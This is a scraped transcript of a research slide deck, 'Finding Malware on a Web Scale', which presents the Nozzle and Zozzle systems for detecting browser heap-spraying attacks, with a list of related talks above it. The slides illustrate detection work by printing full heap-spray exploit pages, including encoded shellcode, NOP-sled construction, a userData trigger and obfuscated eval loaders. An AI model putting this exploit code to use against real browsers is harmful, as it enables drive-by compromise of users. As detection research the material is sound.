Finding Malware on a Web Scale

Slides:



Advertisements
Similar presentations
ROP is Still Dangerous: Breaking Modern Defenses Nicholas Carlini et. al University of California, Berkeley USENIX Security 2014 Presenter: Yue Li Part.
Advertisements

Smashing the Stack for Fun and Profit
Paruj Ratanaworabhan, Cornell University Benjamin Livshits, Microsoft Research Benjamin Zorn, Microsoft Research USENIX Security Symposium 2009 A Presentation.
Rozzle De-Cloaking Internet Malware Presenter: Yinzhi Cao Slides by Ben Livshits with Clemens Kolbitsch, Ben Zorn, Christian Seifert, Paul Rebriy Microsoft.
GATEKEEPER MOSTLY STATIC ENFORCEMENT OF SECURITY AND RELIABILITY PROPERTIES FOR JAVASCRIPT CODE Salvatore Guarnieri & Benjamin Livshits Presented by Michael.
Supplied on \web site. on January 10 th, 2008 Customer Security Management Reducing Internet fraud June 1 st, 2008 eSAC Walk Thru © Copyright Prevx Limited.
By Hiranmayi Pai Neeraj Jain
Nozzle: A Defense Against Heap-spraying Code Injection Attacks Paruj Ratanaworabhan, Cornell University Ben Livshits and Ben Zorn, Microsoft Research (Redmond,
Nozzle: A Defense Against Heap-spraying Code Injection Attacks
Nozzle: A Defense Against Heap Spraying Attacks Ben Livshits Paruj Ratanaworabhan Ben Zorn.
Fast and Precise In-Browser JavaScript Malware Detection
Finding Malware on a Web Scale Ben Livshits Microsoft Research Redmond, WA.
1 Detection of Injected, Dynamically Generated, and Obfuscated Malicious Code (DOME) Subha Ramanathan & Arun Krishnamurthy Nov 15, 2005.
JShield: Towards Real-time and Vulnerability-based Detection of Polluted Drive-by Download Attacks Yinzhi Cao*, Xiang Pan**, Yan Chen** and Jianwei Zhuge***
Ben Livshits and Weidong Cui Microsoft Research Redmond, WA.
Finding Security Errors in Java Applications Using Lightweight Static Analysis Benjamin Livshits Computer Science Lab Stanford University.
Nozzle: A Defense Against Heap-spraying Code Injection Attacks Paruj Ratanaworabhan, Cornell University Ben Livshits and Ben Zorn, Microsoft Research (Redmond,
Methods For The Prevention, Detection And Removal Of Software Security Vulnerabilities Jay-Evan J. Tevis Department of Computer Science and Software Engineering.
Jarhead Analysis and Detection of Malicious Java Applets Johannes Schlumberger, Christopher Kruegel, Giovanni Vigna University of California Annual Computer.
Presentation by Kathleen Stoeckle All Your iFRAMEs Point to Us 17th USENIX Security Symposium (Security'08), San Jose, CA, 2008 Google Technical Report.
11 The Ghost In The Browser Analysis of Web-based Malware Reporter: 林佳宜 Advisor: Chun-Ying Huang /3/29.
Charles Curtsinger UMass at Amherst Benjamin Livshits and Benjamin Zorm Microsoft Research Christian Seifert Microsoft 20 th USENIX Security Symposium.
Gulfstream Salvatore Guarnieri University of Washington Ben Livshits Microsoft Research Staged Static Analysis for Streaming JavaScript Applications.
SANS Technology Institute - Candidate for Master of Science Degree
Address Space Layout Permutation
Performance is Dead, Long Live Performance
1 All Your iFRAMEs Point to Us Mike Burry. 2 Drive-by downloads Malicious code (typically Javascript) Downloaded without user interaction (automatic),
Stamping out worms and other Internet pests Miguel Castro Microsoft Research.
MIS Week 2 Site:
Talking points Attacks are more frequent, more aggressive, require more time to repair and prevent Machines get compromised in 2003 for the same reasons.
1 JavaScript. 2 What’s wrong with JavaScript? A very powerful language, yet –Often hated –Browser inconsistencies –Misunderstood –Developers find it painful.
BLENDED ATTACKS EXPLOITS, VULNERABILITIES AND BUFFER-OVERFLOW TECHNIQUES IN COMPUTER VIRUSES By: Eric Chien and Peter Szor Presented by: Jesus Morales.
3-Protecting Systems Dr. John P. Abraham Professor UTPA.
Rozzle De-Cloaking Internet Malware Ben Livshits with Clemens Kolbitsch, Ben Zorn, Christian Seifert, Paul Rebriy Microsoft Research.
1 Figure 4-16: Malicious Software (Malware) Malware: Malicious software Essentially an automated attack robot capable of doing much damage Usually target-of-opportunity.
Finding Malware on a Web Scale
Computer Science Detecting Memory Access Errors via Illegal Write Monitoring Ongoing Research by Emre Can Sezer.
Mitigation of Buffer Overflow Attacks
Return to the PC Security web page Lesson 5: Dealing with Malware.
Defending Browsers against Drive-by Downloads:Mitigating Heap-Spraying Code Injection Attacks Authors:Manuel Egele, Peter Wurzinger, Christopher Kruegel,
Detecting Targeted Attacks Using Shadow Honeypots Authors: K.G. Anagnostakis, S. Sidiroglou, P. Akritidis, K. Xinidis, E. Markatos, A.D. Keromytis Published:
Virus and anti virus. Intro too anti virus Microsoft Anti-Virus (MSAV) was an antivirus program introduced by Microsoft for its MS-DOS operating system.
Yu Ding, Tao Wei, TieLei Wang Peking University Zhenkai Liang National University of Singapore Wei Zou Peking University 26 th ACSAC (December, 2010)
Stamping out worms and other Internet pests Miguel Castro Microsoft Research.
DETECTING TARGETED ATTACKS USING SHADOW HONEYPOTS AUTHORS: K. G. Anagnostakisy, S. Sidiroglouz, P. Akritidis, K. Xinidis, E. Markatos, A. D. Keromytisz.
Worm Defense Alexander Chang CS239 – Network Security 05/01/2006.
Search Worms, ACM Workshop on Recurring Malcode (WORM) 2006 N Provos, J McClain, K Wang Dhruv Sharma
Malicious Software.
nd Joint Workshop between Security Research Labs in JAPAN and KOREA Polymorphic Worm Detection by Instruction Distribution Kihun Lee HPC Lab., Postech.
Nozzle: A Defense Against Heap Spraying Attacks
Introduction Program File Authorization Security Theorem Active Code Authorization Authorization Logic Implementation considerations Conclusion.
Zozzle: Low-overhead Mostly Static JavaScript Malware Detection.
Making Pages Dynamic Chapter 8 JavaScript for the WWW.
Introduction to JavaScript MIS 3502, Spring 2016 Jeremy Shafer Department of MIS Fox School of Business Temple University 2/2/2016.
SpyProxy SpyProxy Execution-based Detection of MaliciousWeb Content Execution-based Detection of MaliciousWeb Content Hongjin, Lee.
VM: Chapter 7 Buffer Overflows. csci5233 computer security & integrity (VM: Ch. 7) 2 Outline Impact of buffer overflows What is a buffer overflow? Types.
Testing Exploits and Malware in an isolated environment Luca Allodi – Fabio Massacci – Vadim Kotov
1 Introduction to Information Security , Spring 2016 Lecture 2: Control Hijacking (2/2) Avishai Wool.
Powerpoint presentation on Drive-by download attack -By Yogita Goyal.
@Yuan Xue Worm Attack Yuan Xue Fall 2012.
Shellcode COSC 480 Presentation Alison Buben.
Mitigation against Buffer Overflow Attacks
Return Oriented Programming
Secure Programming Dr. X
JavaScript is a programming language designed for Web pages.
Detecting Targeted Attacks Using Shadow Honeypots
All You Ever Wanted to Know About Dynamic Taint Analysis & Forward Symbolic Execution (but might have been afraid to ask) Edward J. Schwartz, Thanassis.
Introduction to Internet Worm
Defencebyte THE PERFECT SECURITY FOR YOUR COMPUTER.
Presentation transcript:

Finding Malware on a Web Scale Ben Livshits Microsoft Research Redmond, WA

Brief History of Memory-Based Exploits 2002 Heap-based buffer overruns Stack-based buffer overruns Stackguard DEP+ASLR 2005 Heap sprays Code red worm Nimda worm 1995

Heap Spraying Firefox 3.5 July 14, 2009 Adobe Acrobat / Reader http://blog.fireeye.com/research/2009/07/actionscript_heap_spray.html Firefox 3.5 July 14, 2009 http://www.web2secure.com/2009/07/mozilla-firefox-35-heap-spray.html Adobe Acrobat / Reader February 19, 2009

Typical heap spray attack <html> <body> <button id=’butid’ onclick=’trigger();’ style=’display:none’/> <script> // Shellcode var shellcode=unescape(‘%u9090%u9090%u9090%u9090%uceba%u11fa%u291f%ub1c9%udb33%ud9ce%u2474%u5ef4%u5631%u030e%u0e56%u0883%uf3fe%u68ea%u7a17%u9014%u1de8%u759c%u0fd9%ufefa%u8048%u5288%u6b61%u46dc%u19f2%u69c9%u94b3%u442f%u1944%u0af0%u3b86%u508c%u9bdb%u9bad%udd2e%uc1ea%u8fc1%u8ea3%u2070%ud2c7%u4148%u5907%u39f0%u9d22%uf385%ucd2d%u8f36%uf566%ud73d%u0456%u0b91%u4faa%uf89e%u4e58%u3176%u61a0%u9eb6%u4e9f%ude3b%u68d8%u95a4%u8b12%uae59%uf6e0%u3b85%u50f5%u9b4d%u61dd%u7a82%u6d95%u086f%u71f1%udd6e%u8d89%ue0fb%u045d%uc6bf%u4d79%u661b%u2bdb%u97ca%u933b%u3db3%u3137%u44a7%u5f1a%uc436%u2620%ud638%u082a%ue751%uc7a1%uf826%uac63%u1ac9%ud8a6%u8361%u6123%u34ec%ua59e%ub709%u552b%ua7ee%u5059%u6faa%u28b1%u05a3%u9fb5%u0fc4%u7ed6%ud357%ue537%u76df%u4148′); bigblock=unescape(“%u0D0D%u0D0D”); headersize=20;shellcodesize=headersize+shellcode.length; while(bigblock.length<shellcodesize){bigblock+=bigblock;} heapshell=bigblock.substring(0,shellcodesize); nopsled=bigblock.substring(0,bigblock.length-shellcodesize); while(nopsled.length+shellcodesize<0×25000){nopsled=nopsled+nopsled+heapshell} // Spray var spray=new Array(); for(i=0;i<500;i++){spray[i]=nopsled+shellcode;} // Trigger function trigger(){ var varbdy = document.createElement(‘body’); varbdy.addBehavior(‘#default#userData’); document.appendChild(varbdy); try { for (iter=0; iter<10; iter++) { varbdy.setAttribute(‘s’,window); } } catch(e){ } window.status+=”; } document.getElementById(‘butid’).onclick(); </script> </body> </html> var shellcode=unescape(‘%u9090%u9090%u9090%u9090%uceba%u11fa%u291f%ub1c9%udb33%ud9ce%u2474%u5ef4%u5631%u030e%u0e56%u0883%uf3fe%u68ea%u7a17%u9014%u1de8%u759c%u0fd9%ufefa%u8048%u5288%u6b61%u46dc%u19f2%u69c9%u94b3%u442f%u1944%u0af0%u3b86%u508c%u9bdb%u9bad%udd2e%uc1ea%u8fc1%u8ea3%u2070%ud2c7%u4148%u5907%u39f0%u9d22%uf385%ucd2d%u8f36%uf566%ud73d%u0456%u0b91%u4faa%uf89e%u4e58%u3176%u61a0%u9eb6%u4e9f%ude3b%u68d8%u95a4%u8b12%uae59%uf6e0%u3b85%u50f5%u9b4d%u61dd%u7a82%u6d95%u086f%u71f1%udd6e%u8d89%ue0fb%u045d%uc6bf%u4d79%u661b%u2bdb%u97ca%u933b%u3db3%u3137%u44a7%u5f1a%uc436%u2620%ud638%u082a%ue751%uc7a1%uf826%uac63%u1ac9%ud8a6%u8361%u6123%u34ec%ua59e%ub709%u552b%ua7ee%u5059%u6faa%u28b1%u05a3%u9fb5%u0fc4%u7ed6%ud357%ue537%u76df%u4148′); Typical heap spray attack

Historical Digression

Research to Reality in 15 Short Months От идеи до продукта drama more drama discovery hope collaboration uncertainty May 2009 – October 2010

April 2009 – October 2010

Heap Sprays Targets web users through the browser Focus on prevention Wanted it to run in the browser Heap Sprays May 2009

Challenges False positives False negatives Performance overhead June 2009

Nozzle Combination of runtime and static analysis Low false positives Low false negatives 5-15% overhead Paper in UsenixSec ‘09 Nozzle August -- March 2009

Browser landscape is very competitive performance-wise 5-15% is too high April 2009

Offline Scanning Help from Bing Finds malware on the web Can scan a large number of URLs Offline Scanning January 2010

October 2010

End of Historical Digression

Drive-By Heap Spraying 0wned!

ASLR prevents the attack Creates the malicious object Drive-By Heap Spraying (2) ASLR prevents the attack Program Heap ok bad PC Creates the malicious object ok <HTML> <SCRIPT language="text/javascript"> shellcode = unescape("%u4343%u4343%...''); </SCRIPT> <IFRAME SRC=file://BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB … NAME="CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC … ഍഍"> </IFRAME> </HTML> Triggers the jump

Allocate 1,000s of malicious objects Drive-By Heap Spraying (3) Program Heap bad ok bad bad bad bad ok bad <SCRIPT language="text/javascript"> shellcode = unescape("%u4343%u4343%...''); oneblock = unescape("%u0C0C%u0C0C"); var fullblock = oneblock; while (fullblock.length<0x40000) { fullblock += fullblock; } sprayContainer = new Array(); for (i=0; i<1000; i++) { sprayContainer[i] = fullblock + shellcode; </SCRIPT> Allocate 1,000s of malicious objects

Nozzle: Runtime Heap Spraying Detection Normalized attack surface (NAS) good bad

Local Malicious Object Detection Is this object dangerous? Code or Data? NOP sled shellcode Is this object code? Code and data look the same on x86 Focus on sled detection Majority of object is sled Spraying scripts build simple sleds Is this code a NOP sled? Previous techniques do not look at heap Many heap objects look like NOP sleds 80% false positive rates using previous techniques Need stronger local techniques 000000000000000000000000000000000000000000000000000000000000000000000000 000000000000 add [eax], al 0101010101 and ah, [edx] 19

Object Surface Area Calculation (1) Assume: attacker wants to reach shell code from jump to any point in object Goal: find blocks that are likely to be reached via control flow Strategy: use dataflow analysis to compute “surface area” of each block An example object from visiting google.com 20

Object Surface Area Calculation (2) 4 2 3 10 14 4 12 6 9 12 14 15 Each block starts with its own size as weight Weights are propagated forward with flow Invalid blocks don’t propagate Iterate until a fixpoint is reached Compute block with highest weight An example object from visiting google.com 21

Nozzle Global Heap Metric Normalize to (approx): P(jump will cause exploit) obj Bi SA(Bi) SA(o) SA(H) NSA(H) build CFG Compute threat of entire heap dataflow Compute threat of single block Compute threat of single object

Nozzle Experimental Summary 0 False Positives 10 popular AJAX-heavy sites 150 top Web sites 0 False Negatives 12 published heap spraying exploits and 2,000 synthetic rogue pages generated using Metasploit Runtime Overhead As high as 2x without sampling 5-10% with sampling

Nozzle Runtime Overhead 24

10% overhead 25

What do we do with all this data? 26

Obfuscation OlOlll="(x)"; OllOlO=" String"; OlllOO="tion"; OlOllO="Code(x)}"; OllOOO="Char"; OlllOl="func"; OllllO=" l = "; OllOOl=".from"; OllOll="{return"; Olllll="var"; eval(Olllll+OllllO+OlllOl+OlllOO+OlOlll+OllOll+OllOlO+OllOOl+OllOOO+OlOllO); eval(""+O(2369522)+O(1949494)+O(2288625)+O(648464)+O(2304124)+O(2080995)+O(2020710)+O(2164958)+O(2168902)+O(1986377)+O(2227903)+O(2005851)+O(2021303)+O(646435)+O(1228455)+O(644519)+O(2346826)+O(2207788)+O(2023127)+O(2306806)+O(1983560)+O(1949296)+O(2245968)+O(2028685)+O(809214)+O(680960)+O(747602)+O(2346412)+O(1060647)+O(1045327)+O(1381007)+O(1329180)+O(745897)+O(2341404)+O(1109791)+O(1064283)+O(1128719)+O(1321055)+O(748985)+...); eval(l(79)+l(61)+l(102)+l(117)+l(110)+l(99)+l(116)+l(105)+l(111)+l(110)+l(40)+l(109)+l(41)+l(123)+l(114)+l(101)+l(116)+l(117)+l(114)+l(110)+l(32)+l(83)+l(116)+l(114)+l(105)+l(110)+l(103)+l(46)+l(102)+l(114)+l(111)+l(109)+l(67)+l(104)+l(97)+l(114)+l(67)+l(111)+l(100)+l(101)+l(40)+l(77)+l(97)+l(116)+l(104)+l(46)+l(102)+l(108)+l(111)+l(111)+l(114)+l(40)+l(109)+l(47)+l(49)+l(48)+l(48)+l(48)+l(48)+l(41)+l(47)+l(50)+l(41)+l(59)+l(125)); var l = function(x) { return String.fromCharCode(x); } var O = function(m){ return String.fromCharCode( Math.floor(m / 10000) / 2); } shellcode = unescape("%u54EB%u758B…"); var bigblock = unescape("%u0c0c%u0c0c"); while(bigblock.length<slackspace) { bigblock += bigblock; } block = bigblock.substring(0, bigblock.length-slackspace); while(block.length+slackspace<0x40000) { block = block + block + fillblock; memory = new Array(); for(x=0; x<300; x++) { memory[x] = block + shellcode; …

Drive By Detection Nozzle Zozzle Visit a page and let it run Watch for new processes Handle infection Detect in a VM Run antivirus Zozzle Observe the page as it runs Watch for a heap spray Kill the script before the vulnerability is triggered Examine the code before it runs When suspect code is found Terminate the page OR Enable other detection mechanisms var she var spray for(i=0; memory[ document.

Timeliness of Detection Detection Techniques Drive By Detection Nozzle Zozzle Certainty Performance Timeliness of Detection Hit Rate

Can We Detect Attacks Statically? Most attacks look like this We don’t find many new attacks

Hierarchical Feature Extraction Naïve Bayes Classification shellcode = unescape("%u54EB%u758B…"); var bigblock = unescape("%u0c0c%u0c0c"); while(bigblock.length<slackspace) { bigblock += bigblock; } block = bigblock.substring(0, bigblock.length-slackspace); while(block.length+slackspace<0x40000) { block = block + block + fillblock; memory = new Array(); Deobfuscation Hierarchical Feature Extraction function loop shellcode = string %u0c0c%u0909… memory block Naïve Bayes Classification * P(malicious) eval(""+O(2369522)+O(1949494)+O(2288625)+O(648464)+O(2304124)+O(2080995)+O(2020710)+O(2164958)+O(2168902)+O(1986377)+O(2227903)+O(2005851)+O(2021303)+O(646435)+O(1228455)+O(644519)+O(2346826)+O(2207788)+O(2023127)+O(2306806)+O(1983560)+O(1949296)+O(2245968)+O(2028685)+O(809214)+O(680960)+O(747602)+O(2346412)+O(1060647)+O(1045327)+O(1381007)+O(1329180)+O(745897)+O(2341404)+O(1109791)+O(1064283)+O(1128719)+O(1321055)+O(748985)+...); Feature P(malicious) string:0c0c 0.99 function:shellcode loop:memory 0.87 abcabcabcabcabc 0.80 try:activex 0.41 if:msie 7 0.33 abcabcabcabcabcabc 0.21 function:unescape 0.45 0.55 loop:nop 0.95 Deobfuscator JavaScript Runtime function:shellcode loop:memory string:%u0c0c%u0909… loop:block

Server Side (Microsoft) The Zozzle Ecosystem Server Side (Microsoft) Browser Side Classifier Classifier 32

Feature Selection False Positives False Negatives

Comparison of Detection Methods Zozzle Google SafeBrowsing Nozzle

Zozzle can automatically identify components of an attack. shellcode = unescape("%u9090%u9090%u54EB%u758B%u8B3C%u3574%u0378%u56F5%u768B%u0320%u33F5%u49C9…"); var memory = []; var spraySize = "548864" - shellcode.length * "2"; var nop = unescape("%u0c0c%u0c0c"); while (nop.length < spraySize / "2") {     nop += nop; } var nops = nop.substring("0", spraySize / "2"); delete nop; for(i = "0"; i < "270"; i++) {     memory[i] = nops + nops + shellcode; } function payload() {     var body = document.createElement("BODY");     body.addBehavior("#default#userData");     document.appendChild(body);     try     {         for(i = "0"; i < "10"; i++)         {             body.setAttribute("s", window);         }     }     catch(e)     {     }     window.status += ""; } document.getElementById("bo").onclick(); shellcode = unescape("%u9090%u9090%u54EB%u758B%u8B3C%u3574%u0378%u56F5%u768B%u0320%u33F5%u49C9…"); var memory = []; var spraySize = "548864" - shellcode.length * "2"; var nop = unescape("%u0c0c%u0c0c"); while (nop.length < spraySize / "2") {     nop += nop; } var nops = nop.substring("0", spraySize / "2"); delete nop; for(i = "0"; i < "270"; i++) {     memory[i] = nops + nops + shellcode; } function payload() {     var body = document.createElement("BODY");     body.addBehavior("#default#userData");     document.appendChild(body);     try     {         for(i = "0"; i < "10"; i++)         {             body.setAttribute("s", window);         }     }     catch(e)     {     }     window.status += ""; } document.getElementById("bo").onclick(); Zozzle can automatically identify components of an attack. Shellcode Spray Vulnerability

Summary Heap spraying attacks are Nozzle Easy to implement, easy to retarget In widespread use Nozzle Effectively detects published attacks (known and new) Has acceptable runtime overhead Can be used both online and offline Zozzle is a static detection solution Fast and scalable Accurate and powerful